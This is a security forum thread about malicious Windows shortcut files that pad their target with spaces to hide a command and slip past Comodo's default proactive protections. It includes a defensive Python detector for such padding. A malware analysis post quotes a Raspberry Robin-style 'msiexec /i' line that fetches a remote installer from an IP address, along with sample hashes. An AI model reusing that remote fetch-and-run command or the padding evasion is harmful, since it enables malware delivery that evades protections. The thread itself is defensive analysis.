LNK Files Bypass All Protections in Comodo (default proactive config)

Hi,

I have some sample LNK files, but CIS doesn’t automatically contain them, and HIPS isn’t effective either. In the Windows properties target, it appears to be just a .cmd command, but there are actually numerous spaces added to exceed the display limit, making it look deceptive.

In the hex viewer, you can see the correct instructions. The spaces look like this:


And the real command is:

I’m using the proactive configuration in CIS. After executing the sample, it successfully connected to the C&C server without any alerts—there were no containment, HIPS, or firewall alerts.

Is there a way for CIS to prevent this type of attack?

3 Likes
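A defender-side check for the padding trick described in the first post, added here as an example that is not from the thread or from Comodo: it reads the StringData of a .lnk (field layout and LinkFlags bits assumed from the MS-SHLLINK spec), returns the full COMMAND_LINE_ARGUMENTS regardless of what the Properties dialog shows, and flags arguments where non-blank text sits behind a long whitespace run. The sample shortcut is constructed inline with a harmless echo command.

```python
import re
import struct

# Layout and LinkFlags bits follow MS-SHLLINK (assumed from the spec, not from this thread).
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
HAS_RELATIVE_PATH, HAS_ARGUMENTS = 0x08, 0x20
HEADER_SIZE = 0x4C
# StringData fields in file order, each a uint16 CountCharacters followed by the characters.
STRING_FIELDS = ((0x04, "name"), (HAS_RELATIVE_PATH, "relpath"), (0x10, "workdir"),
                 (HAS_ARGUMENTS, "args"), (0x40, "icon"))

def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields of a .lnk, skipping LinkTargetIDList and LinkInfo."""
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_IDLIST:        # uint16 IDListSize, then the ItemIDList bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:      # uint32 LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width, out = (2 if flags & IS_UNICODE else 1), {}
    for bit, key in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2:pos + 2 + count * width]
            out[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += 2 + count * width
    return out

def longest_whitespace_run(s: str) -> int:
    return max((len(r) for r in re.findall(r"\s+", s)), default=0)

def is_padded_command(data: bytes, threshold: int = 64) -> bool:
    """True when the arguments hide non-blank text behind a whitespace run >= threshold."""
    args = parse_lnk_strings(data).get("args", "")
    runs = [m for m in re.finditer(r"\s+", args) if len(m.group()) >= threshold]
    return any(args[m.end():].strip() for m in runs)

def build_lnk(relpath: str, args: str) -> bytes:
    """Construct a minimal Unicode .lnk: header + RELATIVE_PATH + COMMAND_LINE_ARGUMENTS."""
    hdr = bytearray(HEADER_SIZE)
    struct.pack_into("<I", hdr, 0, HEADER_SIZE)
    hdr[4:20] = bytes.fromhex("0114020000000000c000000000000046")  # ShellLink CLSID
    struct.pack_into("<I", hdr, 0x14, HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (relpath, args))
    return bytes(hdr) + body

# Constructed sample: the visible prefix looks harmless, the tail sits 300 spaces later.
SAMPLE = build_lnk("..\\..\\Windows\\System32\\cmd.exe",
                   "/c echo hello" + " " * 300 + "& echo hidden-part")
```

Run `is_padded_command` over the .lnk files you collect; a hit means the Properties box would show only the text before the padding, and the full arguments should be reviewed in a hex viewer as the post describes.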

You need to enable embedded code detection for cmd.exe

4 Likes

Check if these settings for cmd code are enabled.

Yes, it’s enabled. I am using the default proactive config

1 Like

Hello, the way is to wait for our friend @DecimaTech; he can show you how and what to do with the tip he told you, with a screenshot and step-by-step instructions. :smiley:

It is not enabled by default you must manually turn it on. There is a second switch that needs to be toggled on that is in the next column as shown in New_Style_xd screenshot.

Edit: Can you paste the full lnk command in your post, as I think I might know the problem, thanks.

1 Like

May I dm you the samples?

1 Like

Hi,
I still got the same result

1 Like

Well you should also check the active process task and set it to show contained only, as it might actually be in containment. Also check the file list changes log to see what was added as trusted, because it might be incorrectly rated as trusted. Finally you can try adding *\winrm.cmd to the script analysis section and enabling embedded code detection for all of the default listed applications.

Otherwise it is most likely a bug with embedded code detection logic, I know I reported it not working for msiexec.exe.

3 Likes

Just looking at things quickly, this guy seems to be a variant of Raspberry Robin in that it uses the command “msiexec /q /i hxxp://154.201.83.175:3989/@ /qn” to connect to a server. There are a number of these that differ in the embedded code, but I guess this particular file is:
0265e8680fd984e4d89b839a06b18498b5d81916fc672006b0a2c401faa162ad. This isn’t malicious in itself (no more than dashost.exe would be) but instead would be if it successfully connected out to a server to download a malicious package (which it does not do).

A variant for which the Powershell command does work is (for the connection request only): 68d22f5b74f63fa13c4723b43545ceef4f588e96d5c3009c08cbe13aea2196ad

The above want to connect out to download a package which would drop in C:\Tiles: these are the files of APerfectDay, the executable of which is signed (although one certificate is outdated) by Tencent and is found to be benign; however also in the package is a dll which is not:

The above example is this (A MSI file that will drop the package and create a startup entry):

9e4ac247acbb7da95936a20d962ce45fb18b752d4ec31c7aab1de45e5792b8ef

As Comodo will not allow the msi to run successfully, one must execute the msi in a VM with Containment off (not really suggesting this, by the way). Note that the installer is in Chinese and there is a few-minute timeout.

Note that although all of these desire to be stealers, none achieves such a lofty goal.

m

5 Likes

Hey cruelsister, could you check my private message?

I guess it’s a bug :frowning:

1 Like